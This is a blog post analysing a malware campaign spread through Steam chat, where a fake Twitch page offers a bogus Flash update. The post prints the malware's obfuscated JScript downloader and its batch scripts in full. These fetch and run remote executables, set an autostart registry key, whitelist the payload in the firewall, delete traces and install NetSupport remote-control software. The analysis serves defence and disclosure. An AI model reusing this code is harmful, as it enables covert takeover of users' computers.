Malware spreads via Steam Chat - including malware analysis

---

Posted: 2015-12-01 by Admin

---

Steam is a multi-player platform developed by Valve Corporation. It is used to distribute games and related media online. Steam provides the user with installation and automatic management of software across multiple computers, community features such as friends lists and groups and in-game voice and chat functionality. The malware comes via Steam's built-in chat client, here is example how it works. Steam Chat:

bakonoda: hey bakonoda: just saw your video bakonoda: nice Ace btw bakonoda: http://twitch.lv/xxxxxxxx/v/XXXXXXXX

The link leads to a copy of the Twitch page. The page loads with a fake message that says your Flash player is outdated and provides a link with the Update.

https://copy.com/XXXXXXXXXX?download=1

Name of the downloaded file:

install_flashplayer_29x83_pssd_win.exe

MD5: 2cccc536122a1d91e8bd3c5fa920364a SHA1: 0aaa59a7637b8f22e6d669324c2f8d0c31140b63 SHA256: 195c7ec50f94211d1b4f36e5bf128ac6c15d1fc256302d7f86687cce811a5050 install_flashplayer_29x83_pssd_win.exe drops 3 Files:

flashupd.bat fl.dat flash.exe

After the 3 File are dropped the install_flashplayer_29x83_pssd_win.exe executes the flashupd.bat, a simple Batch file. flashupd.bat:

@echo off flash.exe e -pv1tal -y fl.dat start twflash.exe ping 127.0.0.1 -n 1 start wscript.exe //B //Nologo //T:360 "twflash.js" ping 127.0.0.1 -n 2

flash.exe is a portable commandline app for extracting archives (UNRAR 4.10), which is used to extract the password protected fl.dat archive. (Password: v1tal)

flash.exe e -pv1tal -y fl.dat

2 files will be extracted:

twflash.exe twflash.js

twflash.exe is UNRAR again, seems not to be used. twflash.js is a script for the Windows Script Host with the following content:

x=false?null:"responseBody"; xx=true?"Shell.Application":null; xxx=ActiveXObject; xxxx=false?null:"Scripting.FileSystemObject"; xxxxx=true?"WScript.Shell":null; xxxxxx=false?null:"ExpandEnvironmentStrings"; xxxxxxx=true?"CreateObject":null; xxxxxxxx=false?null:"Msxml2.XMLhttp"; xxxxxxxxx=true?"open":null; (function(c){function a(a,b){if(!b||!a)return null; b=e[xxxxxx](b); var d=WScript[xxxxxxx](xxxxxxxx); d[xxxxxxxxx]("GET",a,!1); d.send(null); var c=new xxx("ADODB.Stream"); with(c)return Mode=3,Type=1,Open(),Write(d[x]),SaveToFile(b,2),Close(),b}fso=new xxx(xxxx); var e=new xxx(xxxxx); c=new xxx(xx); FileDestr=e[xxxxxx]("%APPDATA%\\"); a("https://copy.com/XXX1","%APPDATA%\\9za.exe"); a("https://copy.com/XXX2","%APPDATA%\\sysfile"); a("https://copy.com/XXX3","%APPDATA%\\systfile.cmd"); c.ShellExecute("cmd.exe",'/c"'+FileDestr+'systfile.cmd"',"","runas",0)})(this);

This script is executed in this line from the Batch script:

start wscript.exe //B //Nologo //T:360 "twflash.js"

3 Files are downloaded by the script :

9za.exe sysfile systfile.cmd

9za.exe you know? UNRAR again! sysfile another Archive, 7-zip this time. systfile.cmd a Batch script again. systfile.cmd:

set a=cd set b=attrib set c=taskkill %a% "%APPDATA%" %b% +h "%APPDATA%\systfile.cmd" if exist "%APPDATA%\rtv.bin" goto end "%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%" %b% +h +s +r "%APPDATA%\sysfiles\*.*" %b% +h +s +r "%APPDATA%\sysfiles" del /f /q "%APPDATA%\sysfile" %a% "%APPDATA%" %a% sysfiles netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE if exist client32.exe start client32.exe taskkill /f /im rundll32.exe ping 127.0.0.1 -n 1 %c% /f /im rundll32.exe reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe" taskkill /f /im client32.exe ping 127.0.0.1 -n 2 if exist client32.exe start client32.exe taskkill /f /im rundll32.exe echo 1>"%APPDATA%\rtv.bin" %b% +s +h "%APPDATA%\rtv.bin" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe" :end %b% -h "%APPDATA%\systfile.cmd" if not exist "%APPDATA%\java.exe" (del /f /q "%APPDATA%\9za.exe") del /f /q "%APPDATA%\sysfile" del /f /q "%APPDATA%\java.exe" del /f /q "%APPDATA%\*.js" del /f /q "%APPDATA%\input" %b% -h "%APPDATA%\systfile.cmd" del /f /q "%APPDATA%\systfile.cmd" del %0

What does the script? First it checks if a file called rtv.bin does exist. The rtv.bin is a Dummy file to make sure that the script is executed only once. This file will be created at the end of the script after its first execution.

echo 1>"%APPDATA%\rtv.bin"

After that check the script extract the sysfile Archive by using the 9za.exe. The Archive is password protected again.(Password: v1nj3ct02)

"%APPDATA%\9za.exe" x -pv1nj3ct02 -y "%APPDATA%\sysfile" -o"%APPDATA%"

A bunch of files will be extracted including a client32.exe. The client32.exe will be added to Windows autorun by that line of the script

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "AppleWebKit" /t REG_SZ /d "%APPDATA%\sysfiles\client32.exe"

and added to the whitelist of the Windows firewall.

netsh firewall add allowedprogram "%APPDATA%\sysfiles\client32.exe" AppleWebKit ENABLE

After that the script deletes itself and all traces. Before the script ends it starts the client32.exe. The client32.exe is identified as NetSupport Manager. NetSupport Manager is a remote control software, allowing remote screen control and systems management. It has a bunch of Features, after the execution the System is fully under the attacker's control.